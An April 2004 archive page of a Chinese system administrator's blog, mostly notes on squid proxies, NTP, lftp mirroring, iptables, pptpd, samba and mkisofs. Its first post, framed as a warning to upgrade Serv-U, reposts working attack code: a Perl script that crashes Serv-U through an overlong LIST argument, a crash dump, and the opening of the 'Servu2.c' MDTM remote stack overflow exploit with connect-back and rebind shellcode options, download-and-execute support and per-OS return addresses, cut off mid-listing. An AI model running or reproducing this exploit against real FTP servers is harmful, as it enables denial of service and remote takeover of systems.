windtear 追求完美: April 2004 Archives

« March 2004 | Main | May 2004 »

April 30, 2004

Serv-U 低版本不安全最低也要5.0.0.4以上 我爱网络

Serv-U exploit <= 5.0.0.41.crash cmd <= 5.0.0.4LIST -l:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-----> ServUCrashReport.txt************ SERV-U DAEMON CRASH REPORT ************ Date: Thu Apr 29 17:18:24 2004Version: Version 5.0 Build: 5.0.0.4 Reason: SERVUD~1.EXE caused a EXCEPTION_ACCESS_VIOLATION in module SERVUD~1.EXE at 001B:004238A3, _GetExceptDLLinfo()+141386 byte(s)Registers:EAX=06E2029B EBX=00E500E4 ECX=00000000 EDX=00000000 ESI=FFFFFFF0EDI=00E500E4 EBP=012DB4F0 ESP=012DB3A4 EIP=004238A3 FLG=00010286CS=001B DS=0023 SS=0023 ES=0023 FS=0038 GS=0000Stack Trace:001B:004238A3 (0x012DBE1C 0x00E500E4 0x00000000 0x012DD248) SERVUD~1.EXE001B:00422A93 (0x01E50034 0x012DD278 0x00000001 0x012DDA7C) SERVUD~1.EXE001B:00421DE6 (0x01E50034 0x012DD278 0x012DE2D4 0x00E6013C) SERVUD~1.EXE001B:00437837 (0x01E50034 0x00DF75A0 0x01E50034 0x01E50034) SERVUD~1.EXE001B:00436FF2 (0x01E50034 0x012DE2D4 0x00DFDCA4 0x01E50034) SERVUD~1.EXE001B:0043B63D (0x01E50034 0x00DF75A0 0x00DFDCA4 0x00000002) SERVUD~1.EXE001B:004334DA (0x01E50034 0x00000008 0x00000002 0x00E10000) SERVUD~1.EXE001B:0046C74E (0x00DFDCA4 0x00000200 0x00000008 0x012DFE74) SERVUD~1.EXE001B:0049DBBA (0x0002001E 0x00000400 0x00000200 0x00000008) SERVUD~1.EXE001B:77E1A2D0 (0x0049DAB8 0x0002001E 0x00000400 0x00000200) USER32.dll001B:77DF45E5 (0x012DFE74 0x00000001 0x004013F5 0x012DFE74) USER32.dll001B:77DF5B51 (0x00DE0038 0x011E0000 0x00EA0A88 0x00000001) USER32.dll001B:0040206E (0x00000000 0x78700659 0x0013BBF0 0x00EA0A88) SERVUD~1.EXE001B:006947B5 (0x00EA0A88 0x0069497C 0x012DFFEC 0x77E6B382) SERVUD~1.EXE001B:006947EF (0x00EA0A88 0x78700659 0x0013BBF0 0x00EA0A88) SERVUD~1.EXE001B:77E6B382 (0x00000000 0x00000000 0x00000000 0x00000000) KERNEL32.DLL-----> crash.pl#!/usr/bin/perluse IO::Socket;$host = "ftp.domain.ip";$port = "21"$user = "username";$pass = "password";$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => $port, );unless ($remote) { die "cannot connect to ftp daemon on $host" }print "connected\n";while (<$remote>){ print $_; if (/220 /) { last; }}$remote->autoflush(1);my $ftp = "USER $user\r\n";print $remote $ftp;print $ftp;sleep(1);while (<$remote>){ print $_; if (/331 /) { last; }}$ftp = join("", "PASS ", "$pass", "\r\n");print $remote $ftp;print $ftp;sleep(1);while (<$remote>){ print $_; if (/230 /) { last; }}my $ftp = join ("", "LIST -l:", "A"x(134), "\r\n");print $remote $ftp;print $ftp;sleep(1);while (<$remote>){ print $_; if (/250 Done/) { last; }}close $remote;2.exploit < 5.0.0.4lionlion@cnhonker.nethttp://www.cnhonker.com2004-02-28 [HUC] Serv-U FTPD 2.x/3.x/4.x/5.x "MDTM" Command Remote ExploitServu2.c 20,8892004-03-04 Serv-U Real Target and Search ASM Code Tool for Overflow Exploit.Servu2.c 21,756sac.cpp 12,848-----> Servu2.c/**-----------------------------------------------------------------------* * Servu2.c - Serv-U FTPD 2.x/3.x/4.x/5.x "MDTM" Command* Remote stack buffer overflow exploit** Copyright (C) 2004 HUC All Rights Reserved.** Author : lion* : lion@cnhonker.net* : http://www.cnhonker.com* Date : 2004-01-07* Update : 2004-02-24 Who report this bug to Rhino??? Released v5.0.0.4 patched this bug. * : 2004-02-17 v7.0 Add Download url file and exec shellcode.* : 2004-02-04 v6.1 Modified to work with UNIX.* : 2004-02-01 v6.0 Change decode and target, change 'jmp(call) ebx' addr to 'pop,pop,ret' addr, can attack winXP and win2003 now.* : 2004-01-31 v5.0 Add msvcrt.dll jmp ebx addr, can use on CN/TW/EN/KR/other win2k SP4 if msvcrt.dll not changed.* : 2004-01-26 v4.2 Change attack target, 2.x to '>= 2.5i' and '<= 2.5h'.* : 2004-01-22 v4.1 Change connectback shellcode in one, change bind shellcode to rebind shellcode.* : 2004-01-13 v4.0 Can attack Serv-U 2.x.* : 2004-01-11 v3.1 Add "PORT" command, can penetrate through the firewall. (shport > 1024)* : 2004-01-09 v3.0 Put shellcode in file parameter, can attack Serv-U 4.1.0.12* : 2004-01-08 v2.0 Add connectback shellcode.* : 2004-01-07 v1.0 Can attack Serv-U v3.0.0.16 ~ v4.1.0.11* Tested : Windows 2000 Server EN/CN* : + Serv-U v3.0.0.16 ~ v5.0.0.3* : + Serv-U v2.5b, v2.5e, v2.5h, v2.5i, v2.5k* : Windows XP EN/CN* : + Serv-U v4.x* Notice : *** Bug find by bkbll (bkbll@cnhonker.net) 2004-01-07 **** : *** You need a valid account. include anonymous!!! **** : *** Private exploit! Don't distributed it!!! **** Complie :On Windows* : cl Servu2.c* :On UNIX* : gcc -o Servu2 Servu2.c -DUNIX* Usage :e:\>Servu2* :Serv-U FTPD 2.x/3.x/4.x/5.x remote overflow exploit V7.0 (2004-01-07)* :Bug find by bkbll (bkbll@cnhonker.net), Code by lion (lion@cnhonker.net)* :Welcome to HUC website http://www.cnhonker.com* :Usage: Servu2 -i <ip> [Options]* : -t Show All Target Type.* :* :[Options:]* : -i Target IP Required* : -t Target Type Default: 0* : -u FTP Username Default: ftp* : -p FTP Password Default: ftp@ftp.com* : -f Port of the FTP Server Default: 21* : -s Port of the Shell Default: 53* : -c Connect back IP For connectback shellcode* : -d Download the URL and Exec Start with 'http://' or 'ftp://'*------------------------------------------------------------------------*/#ifndef UNIX#include <winsock2.h>#include <windows.h>#include <stdio.h>#include <stdlib.h>#pragma comment(lib, "ws2_32")#else #define uint32_t DWORD #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #include <errno.h> #define closesocket(val) close(val) #define SOCKET unsigned int #define SOCKADDR_IN struct sockaddr_in #define BOOL unsigned int #define TRUE 1 #define FALSE 0 #define INVALID_SOCKET -1 #define SOCKET_ERROR -1 #define USHORT unsigned int #define Sleep usleep #define __leave goto exit_try #define _snprintf snprintf typedef struct sockaddr* LPSOCKADDR;#endif#ifdef UNIXint GetLastError() { return errno;}int WSAGetLastError() { return errno;}#endif#define MAX_LEN 2048#define SEH_OFFSET 48-1#define JMP_OVER "\xeb\x06\xeb\x06"#define VERSION "7.0"// for rebind shellcode#define BIND_OFFSET 113// for connectback shellcode#define PORT_OFFSET 95#define IP_OFFSET 88// default parameter#define SHELLPORT 53#define FTPPORT 21#define DEFTYPE 0#define DEFUSER "ftp"#define DEFPASS "ftp@ftp.com"// for Serv-U 2.x#define READ_ADDR "\x01\x01\xfd\x7f"#define READ_OFFSET 5+14+12struct{ DWORD dwJMP; char *szDescription;}targets[] ={ {0x7801D07B,"Serv-U 3.x/4.x/5.x ALL 2K SP3/SP4"}, //msvcrt.dll pop,pop,ret addr// {0x78010394,"Serv-U 3.x/4.x/5.x ALL 2K SP4"}, //msvcrt.dll pop,pop,ret addr {0x77c22ca7,"Serv-U 3.x/4.x/5.x ALL XP SP1"}, //msvcrt.dll pop,pop,ret addr // {0x7FFA1CB5,"Serv-U 3.x/4.x/5.x CN 2K/XP/2K3 ALL"}, //pop,pop,ret addr for all CN win2000,winxp,win2003 {0x7ffa1571,"Serv-U 3.x/4.x/5.x CN 2K/XP/2K3 ALL"}, //pop,pop,ret addr for all CN win2000,winxp,win2003 {0x7ffa1c1b,"Serv-U 3.x/4.x/5.x EN 2K/XP/2K3 ALL"}, //pop,pop,ret addr for all EN win2000,winxp,win2003 {0x7ffae617,"Serv-U 3.x/4.x/5.x TW 2K/XP/2K3 ALL"}, //pop,pop,ret addr for all TW win2000,winxp,win2003// {0x7ffa2186,"Serv-U 3.x/4.x/5.x TW 2K ALL"}, //jmp ebx addr for all TW win2000 {0x7ffa4a1b,"Serv-U 3.x/4.x/5.x KR 2K ALL"}, //jmp ebx addr for all KR win2000 {0x7ffa4512,"Serv-U 2.x >= 2.5i CN 2K/XP/2K3 ALL"}, //jmp esp addr for all CN win2000,winxp,win2003 {0x7ffa4512,"Serv-U 2.x <= 2.5h CN 2K/XP/2K3 ALL"}, //jmp esp addr for all CN win2000,winxp,win2003 {0x7ffa24ce,"Serv-U 2.x >= 2.5i TW 2K/XP/2K3 ALL"}, //jmp esp addr for all TW win2000,winxp,win2003 {0x7ffa24ce,"Serv-U 2.x <= 2.5h TW 2K/XP/2K3 ALL"}, //jmp esp addr for all TW win2000,winxp,win2003 {0x7ffa82a4,"Serv-U 2.x >= 2.5i KR 2K/XP/2K3 ALL"}, //call esp addr for all KR win2000,winxp,win2003 {0x7ffa82a4,"Serv-U 2.x <= 2.5h KR 2K/XP/2K3 ALL"}, //call esp addr for all KR win2000,winxp,win2003 More...

Posted by windtear at 1:45 AM

April 29, 2004

HoeKey - 超小巧超强悍的快捷键小工具 我爱网络

点击下载HoeKeyA12b4.ziphttp://bcheck.arsware.org/hoe.phphttp://bcheck.arsware.org/HoeKeyA12b4.ziphttp://bcheck.arsware.org/HoeKeyA12b4Inst.exehttp://bcheck.arsware.org/hoekey.htm下午看到网友推荐试了试太强大了惊呆发信人: Machael (Special Striving For), 信区: NewSoftware标题: 顶力推荐:超级好用,超级强大的热键软件发信站: BBS 水木清华站 (Thu Apr 29 14:41:07 2004), 站内前言:它小巧(13k),但是功能强大它绿色,却又完全免费,它可以把M$留给我们的一点点应用接口,运用得出神入化,调制出一键走天下的超级设置它究竟是神仙的化身？还是地狱的使者？没人知道，但是可以肯定，每个人都给他一个称号───Hoe~Key！.看看我用它热键设置的功能吧:win+F12: TC,win+F11: FlashFXP,win+F10: MyIE,win+N: Notepad,win+end: 缩小当前窗口到托盘中,win+home: 恢复最后一个隐藏的窗口,win+Y: 显示当前窗口可以Copy的文字,win+S: cmd.exe并进入当前目录,win+~: 关闭显示器,win+K: 杀掉当前进程,win+up: 最大化当前窗口,win+down: 恢复当前窗口.....打包中的hoekey.ini是我设置的,一般人应用够了,如果觉得不够爽可以恢复缺省带的ini更多更高级的功能设置需要看帮助了,不看不知道,实在是强.推荐推荐再推荐!-----> hoekey.ini; HoeKey config - example from a12b4;; key modifiers:; ~=windows, _=shift, ^=ctrl, @=alt;; some general good stuff-=Rem|-- General --~Q=Config~end=Hide||1 ; win+end: hide current window~_end=Hide||2 ; win+end: hide current window~home=Unhide More...

Posted by windtear at 8:03 PM

SquidNT - Squid 2.5 for Windows NT 4.0/2000/XP/2003 我爱网络

-----> homepagehttp://www.acmeconsulting.it/pagine/opensource/squid/squidnt25.htmSquid 2.5 for Windows NT 4.0/2000/XP/2003Native port of Squid 2.5, with many NT service enhancement.Current features: Based on Squid 2.5 STABLE 5 Run as a native Windows NT Service Currently supported build environments: Microsoft Visual C++ 6.0 SP5 MSYS + MinGW Cygwin Multiple Squid service instances are allowed Full Command line support when running as a service Automatic Service More...

Posted by windtear at 3:15 PM

April 28, 2004

squid ipcn.pac use URLHash2 of SPS(Super Proxy Script) - remove ipcnauth 我爱网络

ipcn proxy 暂时去掉身份认证并增加根据请求网址选择缓存大家什么都不需改设好自动配置脚本就行先过节了 http_access deny tolib-http_access allow tothu fromthu ipcnauth+http_access allow tothu fromthu http_access deny tothu-http_access allow ipcnauth !porn+http_access allow !porn http_access deny all -if(isPlainHostName(host) || dnsDomainIs(host,".cn")) return "DIRECT";+//if(isPlainHostName(host) || dnsDomainIs(host,".cn")) return "DIRECT";+if(isPlainHostName(host)) return "DIRECT";-else return "PROXY proxy2.ipcn.org:PORT";+else {+ var n = URLhash2(url) % 5;+ if (n < 4) return "PROXY proxy2.ipcn.org:PORT; PROXY proxy.ipcn.org:PORT; DIRECT";+ if (n < 5) return "PROXY proxy.ipcn.org:PORT; More...

Posted by windtear at 7:32 PM

ntpdate time synchronization & date usage 我爱网络

% rpm -Uvh ./disk1/RedHat/RPMS/libcap-1.10-8.i386.rpm% rpm -Uvh ./disk1/RedHat/RPMS/ntp-4.1.1-1.i386.rpm% ntpdate clock.cuhk.edu.hk28 Apr 01:15:39 ntpdate[3990]: no server suitable for synchronization foundhttp://www.time.edu.cnhttp://www.time.edu.cn/download/ntp-4.2.0.tar.gz% ntpdate s1a.time.edu.cn28 Apr 01:10:14 ntpdate[3928]: step time server 202.112.10.60 offset 1.134021 sec-----> http://www.time.edu.cn/mem.htmCERNET时间服务结构第一级为4个核心节点：清华、北邮、北大、东南大学。第二级直接从第一级获得时间服务。第三级只从第二级节点获得时间服务。 N级服务器的域名为sN[a-z].time.edu.cn CERNET时间服务提供者列表 [ 查看各个服务器的状态 ] The structure of servers The NTP server list The status of the NTP servers I want to join the service I have a question CERNET的一级及二级时间服务器已经建立起来。为了提供最便捷准确的时间服务，我们希望各地区和省节点提供三级服务器，以服务于本地区的网络。加入我们的时间服务网络！级域名地理位置负责人邮件电话1s1a.time.edu.cn北京邮电大学王振华wzhdl at bupt.edu.cn010-62283044-80031s1b.time.edu.cn清华大学李艳玲liyl02 More...

Posted by windtear at 1:19 AM

squid cache_peer access log analysis crontab demo 我爱网络

# proxy59 23 * * * /opt/old_access/squid-log.sh.new.sh0 0 * * * /opt/old_access/cron.squid.autodeny.sh5 0 * * * /opt/old_access/squid-log.sh.new.sh.step2.sh# proxy259 23 * * * /opt/old_access/squid-log.sh.new.sh0 0 * * * /opt/old_access/cron.squid.autodeny.sh# proxy-----> /opt/old_access/squid-log.sh.new.shNOW_DATE=$(date +%Y%m%d)killall tail/opt/old_access/generate.currentdeny.squid.from.iptables.sh/sbin/iptables -F squid/bin/mv -f $OLD_ACCESS/access.log $OLD_ACCESS/access.log.bak/usr/sbin/squid -k rotate# proxy-----> /opt/old_access/squid-log.sh.new.sh.step2.shNOW_DATE=$(date --date=yesterday +%Y%m%d)cd $OLD_ACCESSwget http://proxy2/_old_log_/access.log.bak.$NOW_DATE.gz[[ -f $OLD_ACCESS/access.log.bak.$NOW_DATE.gz ]] && zcat access.log.bak.$NOW_DATE.gz >> access.log.bak && rm -f access.log.bak.$NOW_DATE.gz/opt/old_access/pwebstats -c /opt/old_access/squid-proxy.conf/bin/mv -f $OLD_ACCESS/access.log.bak $OLD_ACCESS/access.log.bak.$NOW_DATE/bin/gzip $OLD_ACCESS/access.log.bak.$NOW_DATE# proxy# proxy2-----> /opt/old_access/cron.squid.autodeny.sh DATE=$(date +%Y%m%d)cd /opt/old_accessmv squid.deny _old_deny_/squid.deny.$DATEmv squid.deny.log _old_deny_/squid.deny.log.$DATEtail -f /opt/old_access/access.log | /opt/old_access/autodeny.pl# proxy2-----> /opt/old_access/squid-log.sh.new.shNOW_DATE=$(date +%Y%m%d)killall tail/sbin/iptables -F squid/bin/mv -f $OLD_ACCESS/access.log $OLD_ACCESS/_old_log_/access.log.bak.$NOW_DATE/usr/sbin/squid -k rotategzip $OLD_ACCESS/_old_log_/access.log.bak.$NOW_DATE More...

Posted by windtear at 12:59 AM

April 27, 2004

lftp - my fav & some mirror method - ncftp wget rsync 我爱网络

lftp - my fav & some mirror method - ncftp wget rsync% rpm -qi lftpName : lftp Relocations: (not relocateable)Version : 2.4.9 Vendor: Red Hat, Inc.Release : 2 Build Date: Wed 10 Dec 2003 12:47:55 AM CSTInstall date: Tue 23 Dec 2003 01:43:56 AM CST Build Host: bugs.devel.redhat.comGroup : Applications/Internet Source RPM: lftp-2.4.9-2.src.rpmSize : 1734259 License: GPLPackager : Red Hat, Inc. <http://bugzilla.redhat.com/bugzilla>URL : http://lftp.yar.ru/Summary : A sophisticated file transfer programDescription :LFTP is a sophisticated ftp/http file transfer program. Like bash, it has jobcontrol and uses the readline library for input. It has bookmarks, built-inmirroring, and can transfer several files in parallel. It is designed withreliability in mind.% lftp -hUsage: lftp [OPTS] <site>`lftp' is the first command executed by lftp after rc files -f <file> execute commands from the file and exit -c <cmd> execute the commands and exit --help print this help and exit --version print lftp version and exitOther options are the same as in `open' command -e <cmd> execute the command just after selecting -u <user>[,<pass>] use the user/password for authentication -p <port> use the port for connection <site> host name, URL or bookmark name% more /etc/lftp.conf ## some useful aliasesalias dir lsalias less morealias zless zmorealias bzless bzmorealias l "ls -l"alias lm "ls -l | more"alias lt "ls -ltr"alias ltm "ls -ltr | more"alias d3 "debug 3"set net:reconnect-interval-base 1set net:reconnect-interval-max 1set net:reconnect-interval-multiplier 1set net:max-retries 4## make prompt look better#set prompt "lftp \u\@\h:\w> "set prompt "ftp://\u\@\h\w > "% man lftpNAME lftp - Sophisticated file transfer programSYNTAX lftp [-d] [-e cmd] [-p port] [-u user[,pass]] [site] lftp -f script_file lftp -c commands lftp --version lftp --helpVERSION This man page documents lftp version 2.4.0. On startup, lftp executes /etc/lftp.conf and then ~/.lftprc and ~/.lftp/rc. You can place aliases and `set' commands there. Some people preferto see full protocol debug, use `debug' to turn the debug on. Use `debug 3' to see only greeting messages and error messages.!lsrelsdebug 3queue wait 0queue get filename.extqueue -d 3mirror dir/mirror -R dir_to_be_uploadedget filename.ext -o newfilename.newextget -c filename.exeopen ftp://user:pass@dns.server.ip:port/user usernamejobswctrl zget filename.ext &pget -n bigfilename.extmirror -c --parallel=n dir/bookmark add bmnamebookmark editdu -shmget -c ftp://fxpsite1/filename.ext ftp://fxpsite2/newfilename.newext-----> some mirror method发信人: windtear (风中之珠), 信区: Service标题: 镜像的几种方法发信站: HAPPY (Fri Apr 27 16:46:47 2001)wgetncftpget我用这两个多一些example:wget -q -b -c -m -nr --tries=0 --wait=120 --timeout=120 ftp://166.111.215.36/incoming/_starw_/discovery/wget -q -b -c -m -nr -nd --tries=0 --wait=120 --timeout=120 ftp://166.111.146.88:21/f:/FTP/Pub/RM/永不瞑目/ncftpget -b -R -P 1021 ftp.sparrows.dhs.org . /pub/Movie/鉴证实录IIncftpget -u *** -p *** -b -R 166.111.168.21 . /射雕英雄传/压好的RM/铁血丹心rsync -r ftp.ns-lab.com::ftp/incoming/_starw_/discovery .当然 ncftp lftp 运行后 & 或者 Ctrl+z bg 都可以的说--※ 来源:．HAPPY bbs.happynet.org．[FROM: 166.111.168.21]i like rsync:Prsync -rvutoglpD More...

Posted by windtear at 10:27 PM

April 26, 2004

netfilter/iptables nat PREROUTING REDIRECT 解决邮件服务器绑定锁 我爱网络

netfilter/iptables nat PREROUTING REDIRECT 解决邮件服务器绑定锁其实这个应该早几天写的发信人: windtear (Are You Happy?!), 信区: Linux标题: Re: 我临时用 iptables 解决了 ××××/smtpd 的端...发信站: ××××BBS (2004年04月21日11:23:46 星期三), 站内信件assp bind 125smtpd bind 25iptables -t nat -I PREROUTING 1 -s ! 127.0.0.1 -p tcp --dport 25 -j REDIRECT --to-ports 125assp 配置里面 assp.cfglistenPort:=125smtpDestination:=127.0.0.1:25----->antispam assp (qmail) - Anti-Spam SMTP Proxy (ASSP)AntiSpam - C/R System - TMDA - wle - 反垃圾邮件my attemp about 2 mail and 1 bbs More...

Posted by windtear at 10:23 PM

April 25, 2004

pptpd PoPToP ppp - a simple sample of vpn 我爱网络

% cat /etc/pptpd.conf speed 115200option /etc/ppp/options.pptpdlocalip 172.16.162.105remoteip 172.16.162.106-254% cat /etc/ppp/options.pptpdlockname pptpdauthnodefaultroutenoproxyarp+chap+chapms+chapms-v2% pptpd -vPoPToP v1.1.4-b4% rpm -qi pppName : ppp Relocations: (not relocateable)Version : 2.4.1 Vendor: (none)Release : 3mppe Build Date: Fri 08 Feb 2002 08:39:32 PM CSTInstall date: Sun 25 Apr 2004 02:27:05 PM CST Build Host: opennms.linvision.internGroup : System Environment/Daemons Source RPM: ppp-2.4.1-3mppe.src.rpmSize : 390504 License: distributableSummary : The PPP (Point-to-Point Protocol) daemon.Description :The ppp package contains the PPP (Point-to-Point Protocol) daemon anddocumentation for PPP support. The PPP protocol provides a method fortransmitting datagrams over serial point-to-point links. PPP isusually used to dial in to an ISP (Internet Service Provider) or otherorganization over a modem and phone line.% cd /etc/ppp; rename ip orig.ip ip*% modprobe ppp% pptpd -fd% pptpd -hPoPToP v1.1.4-b4The PPTP Server for LinuxUsage: pptpd [options], where options are: [-c] [--conf file] Specifies the config file to read default settings from (default is /etc/pptpd.conf). [-d] [--debug] Turns on debugging (to syslog). [-f] [--fg] Run in foreground. [-h] [--help] Displays this help message. [-l] [--listen x.x.x.x] Specifies IP of local interface to listen to. [-o] [--option file] Specifies the PPP options file to use (default is /etc/ppp/options). [-p] [--pidfile file] Specifies the file to write the process ID to (default is /var/run/pptpd.pid). [-s] [--speed baud] Specifies the baud speed for the PPP daemon (default is 115200). [-t] [--stimeout seconds] Specifies the timeout for the first packet. This is a DOS protection (default is 10). [-v] [--version] Displays the PoPToP version number.Logs and debugging go to syslog as DAEMON.Command line options will override any default settings and any settingsspecified in the config file (default config file: /etc/pptpd.conf). More...

Posted by windtear at 4:18 PM

SMB 网上邻居网邻 samba@linux net@windows 我爱网络

-----> samba - linux smb server% cat smb.conf[global] netbios name = windtear workgroup = WORKGROUP server string = linux smb server #socket address = 10.35.0.253 #hosts allow = 127. 10.35. #hosts deny = all #inherit permissions = yes create mask = 0664 directory mask = 0775 log file = /var/log/samba/log.%I max log size = 50 password level = 8 encrypt passwords = yes smb passwd file = /etc/samba/smbpasswd socket options = TCP_NODELAY SO_RCVBUF=8192 SO_SNDBUF=8192 dns proxy = no[homes] comment = Home Directories path = /home/%u browseable = no writable = yes [_ROOT_] comment = _ROOT_ path = / guest ok = No read only = No browseable = No valid users = root write list = root -----> windows client% net use X: "\\172.16.162.105\DIR" password /USER:user% net use X: /DELETE% net use \\172.16.162.105\ipc$ /delete\\172.16.162.105\ipc$ 已经删除。%-----> smb init.d no NMBD#!/bin/sh## chkconfig: - 91 35# description: Starts and stops the Samba smbd daemons \# used to provide SMB network services.## pidfile: /var/cache/samba/smbd.pid# config: /etc/samba/smb.conf# Source function library.if [ -f /etc/init.d/functions ] ; then . /etc/init.d/functionselif [ -f /etc/rc.d/init.d/functions ] ; then . /etc/rc.d/init.d/functionselse exit 0fi# Avoid using root's TMPDIRunset TMPDIR# Source networking configuration.. /etc/sysconfig/networkif [ -f /etc/sysconfig/samba ]; then . /etc/sysconfig/sambafi# Check that networking is up.[ ${NETWORKING} = "no" ] && exit 0# Check that smb.conf exists.[ -f /etc/samba/smb.conf ] || exit 0RETVAL=0start() { KIND="SMB" echo -n $"Starting $KIND services: " daemon smbd $SMBDOPTIONS RETVAL=$? echo [ $RETVAL -eq 0 ] && touch /var/lock/subsys/smb || \ RETVAL=1 return $RETVAL} stop() { KIND="SMB" echo -n $"Shutting down $KIND services: " killproc smbd RETVAL=$? echo [ $RETVAL -eq 0 ] && rm -f /var/lock/subsys/smb echo "" return $RETVAL} restart() { stop start} reload() { echo -n $"Reloading smb.conf file: " killproc smbd -HUP RETVAL=$? echo return $RETVAL} rhstatus() { status smbd} case "$1" in start) start ;; stop) stop ;; restart) restart ;; reload) reload ;; status) rhstatus ;; condrestart) [ -f /var/lock/subsys/smb ] && restart || : ; More...

Posted by windtear at 4:17 PM

April 23, 2004

[IPCN] 参加挑战杯 2004-04-24 17:00 综体西网球 我爱网络

欢迎大家去机械系展棚头盔到时介绍三个IPCN代理系统(proxy.ipcn.org) IPCN域名系统(domain.ipcn.org) IPCN搜索系统(search.ipcn.org) More...

Posted by windtear at 4:45 PM

April 21, 2004

antispam assp (qmail) - Anti-Spam SMTP Proxy (ASSP) 我爱网络

http://assp.sourceforge.netASSP DocumentationThe Anti-Spam SMTP Proxy (ASSP) Server is an open source, platform-independent SMTP Proxy server which implements whitelists and Bayesian filtering to rid the planet of the blight of unsolicited email (UCE). UCE must be stopped at the SMTP server. Anti-spam tools must be adaptive to new spam and customized for each site?s mail patterns. This free, easy-to-use tool works More...

Posted by windtear at 2:09 AM

April 20, 2004

我爱网络 我爱网络

目前的状态1.ssh->linux screen bbs2.ppp->linux pptpd -not free ip ppp->windows rras -smb3.rdp->windows file misc + kill vmware rdp->windows 4.pcanywhere->windows start vmware gsx server bug here: no shift no ctrl+all -> so goto 3 kill:( so 5 remote console5.vmware remote console-> vmware gsx serverjust iso testandie -> file://e:/ipcn.paccmd -> windump -n ... More...

Posted by windtear at 12:19 AM

April 19, 2004

mkisofs demo 我爱网络

-----> demo# sample of mkisofs-1.15a40.tgz (mkisofs 1.15a40 +gbk +md5)mkisofs -o /cdr/dsk3.iso -no-emul-boot -eltorito-boot loader.bin -hide-rr-moved -hide loader.bin -hide-joliet loader.bin -hide boot.catalog -hide-joliet boot.catalog -V "WinXPPro" -copyright "Microsoft China" -J -O -R -N -l -relaxed-filenames -gbk4dos-filenames -gbk4win-filenames /cdr/boot /cdr/root /cdr/dsk1 /cdr/dsk2 /cdr/dsk3# minemkisofs -o e:\windows01.v0.004.iso -no-emul-boot -eltorito-boot LOADER.BIN -hide-rr-moved -hide LOADER.BIN -hide-joliet LOADER.BIN -hide boot.catalog -hide-joliet boot.catalog -V "Windows3in1" -copyright "Microsoft China" More...

Posted by windtear at 11:35 PM

April 18, 2004

Sophos sweep IDE update script - Download the IDE file - demo 我爱网络

#!/bin/sh# Script for Sophos Sweep by Reiner Keller## For Sophos, see also http://www.sophos.com/support/faqs/autodown.html# ("How to automate the downloading of IDE files").#cd /usr/lib/sophos cd /usr/local/sav/usr/bin/wget -q -N `/usr/bin/sweep -v |/bin/grep "Product version" |/bin/sed -e "s/.*: $.$\.$..$$/ http:\/\/www.sophos.com\/downloads\/ide\/\1\2_ides.zip/"`/usr/bin/unzip -q -n "???_ides.zip"rm -f *_ides.zipchmod 644 * @ http://phst.ph.mahidol.ac.th/Linux/software/sophos.cron126297 Apr 17 12:09 380_ides.zip% unzip -l /opt/soft/380_ides.zip Archive: /opt/soft/380_ides.zip Length Date Time Name -------- ---- ---- More...

Posted by windtear at 6:10 PM

Windows Integrated & Combination Installation - Nin1 - QChain.exe/Qfecheck.exe 我爱网络

-----> QChain.exe (old1)http://support.microsoft.com/?kbid=296861Microsoft Knowledge Base Article - 296861如何在只重新启动一次的情况下安装多个 Windows 更新程序或修复程序概要本文介绍了如何在只重新启动一次的情况下安装多个使用 Hotfix.exe (Microsoft Windows NT 4.0) 或 Update.exe（Microsoft Windows 2000、Microsoft Windows XP 或 Microsoft Windows Server 2003）的 Windows 产品更新（例如，关键更新、安全修补程序或修复程序）。本文所面向的读者为管理员和 IT 专业人员。您可以安装单独使用 Hotfix.exe 或 Update.exe 的 Windows 产品更新，也可以安装联合使用 Windows（带有或不带有 Service Pack）与 Hotfix.exe 或 Update.exe 的 Windows 产品更新。注意：本文中介绍的过程对于不使用 Hotfix.exe 或 Update.exe 作为安装程序的产品更新不适用。例如，Windows NT 4.0、Windows 2000 和 Windows XP 的 Internet Explorer 更新使用基于 INF More...

Posted by windtear at 12:24 AM

April 17, 2004

squid filter - blacklist of squidguard 我爱网络

An ultrafast and free filter, redirector and access controller for Squid (http://www.squid-cache.org/)http://www.squidguard.org/Tue Dec 18 2001: squidGuard-1.2.0 has been released!http://www.squidguard.org/blacklist/http://ftp.teledanmark.no/pub/www/proxy/squidGuard/contrib/blacklists.tar.gzftp://ftp.teledanmark.no/pub/www/proxy/squidGuard/contrib/blacklists.tar.gz-----> README !!! WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING !!!!!! !!!!!! These blacklists are entierly products of a dumb robot (squidGuardRobot) !!!!!! We recommend that you review the lists before using them. !!!!!! Don't blame us if there are mistakes, but please report errors !!!!!! with the online tool at http://www.squidguard.org/blacklist/ !!!!!! !!!!!! WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING !!!-----> domains## !!! WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING !!!## This list is entierly a product of a dumb robot (squidGuardRobot-2.3.7).# We strongly recommend that you review the lists before using them!# Don't blame us if there are mistakes, but please report errors with# the online tool at http://www.squidguard.org/blacklist/## !!! WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING !!!## This list was compiled in 313:58:55 on 2004.04.16 03:48:09.# This list was compiled from 985 link sources and 1615446 links,# of which 98135 tested successfully.#!! here not use squidguard itself, just cp its blacklist into acl url_regex !!发信人: windtear ( 死磕论文 ), 信区: NetResources标题: Re: 【公告】俺家代理过滤加强了发信站: BBS 水木清华站 (Sat Apr 17 17:10:59 2004), 转信....." / e t c / s q u i d / p o r n / d o m a i n s "# 这个是一份老的 Modify: Mon Sep 13 20:39:33 1999# @ 1852737 Dec 18 2001 squidGuard-1.2.0.tar.gz# 新的太大了没敢用 Modify: Fri Apr 16 10:03:15 2004# " / e t c / s q u i d / p o r n / e x p r e s s i o n s "# 这个是(最)新的 Modify: Mon Jun 17 19:03:22 2002!! Attention here: 255 bytes limit in "file" line ... acl ... ... "file" !!http_access allow ipcnauth !porndeny_info ERR_PORN_DENIED porn all-----> /etc/squid/errors/ERR_PORN_DENIED .....Access Filtered...... More...

Posted by windtear at 5:34 PM

squid-2.5.STABLE5 以及 IPCN 的一些调整 我爱网络

